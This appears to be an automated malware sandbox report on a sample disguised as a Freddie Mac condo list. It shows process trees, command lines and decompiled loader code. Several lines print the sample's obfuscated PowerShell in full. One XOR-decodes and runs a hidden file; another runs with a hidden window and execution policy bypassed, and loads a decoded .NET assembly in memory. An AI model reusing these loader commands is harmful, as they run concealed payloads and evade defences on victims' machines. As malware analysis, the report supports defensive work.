Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6324 Parent PID: 5344

General

Start time:	00:04:57
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6332 Parent PID: 6184

General

Start time:	00:04:57
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6384 Parent PID: 5344

General

Start time:	00:04:58
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6400 Parent PID: 6324

General

Start time:	00:04:58
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6444 Parent PID: 6384

General

Start time:	00:04:58
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6452 Parent PID: 5344

General

Start time:	00:04:58
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 6584 Parent PID: 6452

General

Start time:	00:04:59
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 6604 Parent PID: 4936

General

Start time:	00:05:05
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
Imagebase:	0xa60000
File size:	9475120 bytes
MD5 hash:	9AEBA3BACD721484391D15478A4080C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 7152 Parent PID: 6604

General

Start time:	00:05:10
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=6276574450601077519 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6276574450601077519 --renderer-client-id=2 --mojo-platform-channel-handle=1692 --allow-no-sandbox-job /prefetch:1
Imagebase:	0xa60000
File size:	9475120 bytes
MD5 hash:	9AEBA3BACD721484391D15478A4080C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 1180 Parent PID: 6604

General

Start time:	00:05:21
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=1744333678202893021 --mojo-platform-channel-handle=1700 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Imagebase:	0xa60000
File size:	9475120 bytes
MD5 hash:	9AEBA3BACD721484391D15478A4080C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 2052 Parent PID: 6604

General

Start time:	00:05:29
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8461560770759488801 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8461560770759488801 --renderer-client-id=4 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1
Imagebase:	0xa60000
File size:	9475120 bytes
MD5 hash:	9AEBA3BACD721484391D15478A4080C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 6960 Parent PID: 6604

General

Start time:	00:05:31
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1409198475444217207 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1409198475444217207 --renderer-client-id=5 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job /prefetch:1
Imagebase:	0xa60000
File size:	9475120 bytes
MD5 hash:	9AEBA3BACD721484391D15478A4080C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 5968 Parent PID: 6604

General

Start time:	00:05:34
Start date:	28/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1680,1258581056546126343,3332043117524754671,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=296205125084197778 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=296205125084197778 --renderer-client-id=6 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
Imagebase:	0xa60000
File size:	9475120 bytes
MD5 hash:	9AEBA3BACD721484391D15478A4080C7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 5700 Parent PID: 3388

General

Start time:	00:05:40
Start date:	28/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'PowerShell.exe' -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd '$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT()'
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 4144 Parent PID: 5700

General

Start time:	00:05:40
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6584 Parent PID: 6184

General

Start time:	00:05:55
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 6740 Parent PID: 6584

General

Start time:	00:05:56
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 3476 Parent PID: 6324

General

Start time:	00:05:57
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 1784 Parent PID: 3476

General

Start time:	00:05:58
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 5508 Parent PID: 6384

General

Start time:	00:05:58
Start date:	28/08/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell
Imagebase:	0x1200000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 2616 Parent PID: 5508

General

Start time:	00:05:59
Start date:	28/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 5352 Parent PID: 5700

General

Start time:	00:06:14
Start date:	28/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Freddie-Mac-Warrantable-Condo-List.exe PID: 3164 Parent PID: 780 Freddie-Mac-Warrantable-Condo-List.exeCOMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.6%
Total number of Nodes:	859
Total number of Limit Nodes:	34

Executed Functions

Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}

0x004b5115
0x004b5117
0x004b511c
0x004b511c
0x004b511e
0x004b5120
0x004b5120
0x004b5128
0x004b5129
0x004b512e
0x004b5131
0x004b5134
0x004b513b
0x004b536d
0x004b536f
0x004b5372
0x004b5375
0x004b5387
0x004b5141
0x004b514b
0x004b514d
0x004b5154
0x004b515a
0x004b5167
0x004b516b
0x004b5172
0x004b5177
0x004b5179
0x004b5179
0x004b516b
0x004b517c
0x004b5188
0x004b518f
0x004b5196
0x004b5196
0x004b519b
0x004b51a8
0x004b51b4
0x004b51ba
0x004b51c1
0x004b51c6
0x004b51c6
0x004b51d4
0x004b51e0
0x004b51e0
0x004b51f3
0x004b51fb
0x004b520e
0x004b5216
0x004b5229
0x004b5231
0x004b5244
0x004b524c
0x004b525f
0x004b5267
0x004b527a
0x004b5282
0x004b5295
0x004b529d
0x004b52b0
0x004b52b8
0x004b52cb
0x004b52d3
0x004b52e6
0x004b52ee
0x004b5301
0x004b5309
0x004b531c
0x004b5324
0x004b5337
0x004b533f
0x004b533f
0x004b51b4
0x004b534a
0x004b5351
0x004b5358
0x004b5358
0x004b5360
0x004b5367
0x004b536b
0x004b536b
0x00000000
0x004b5367

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188

Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F

GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B

Strings

SetDefaultDllDirectories, xrefs: 004B515C
uxtheme.dll, xrefs: 004B51E8
version.dll, xrefs: 004B52C0
propsys.dll, xrefs: 004B5254
apphelp.dll, xrefs: 004B5239
hK, xrefs: 004B51D6
kernel32.dll, xrefs: 004B5141
userenv.dll, xrefs: 004B5203
SetSearchPathMode, xrefs: 004B5344
profapi.dll, xrefs: 004B52DB
ntmarta.dll, xrefs: 004B532C
hK, xrefs: 004B51A3
SetDllDirectoryW, xrefs: 004B5182
dwmapi.dll, xrefs: 004B526F
cryptbase.dll, xrefs: 004B528A
SetProcessDEPPolicy, xrefs: 004B535A
setupapi.dll, xrefs: 004B521E
clbcatq.dll, xrefs: 004B5311
comres.dll, xrefs: 004B52F6
oleacc.dll, xrefs: 004B52A5

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

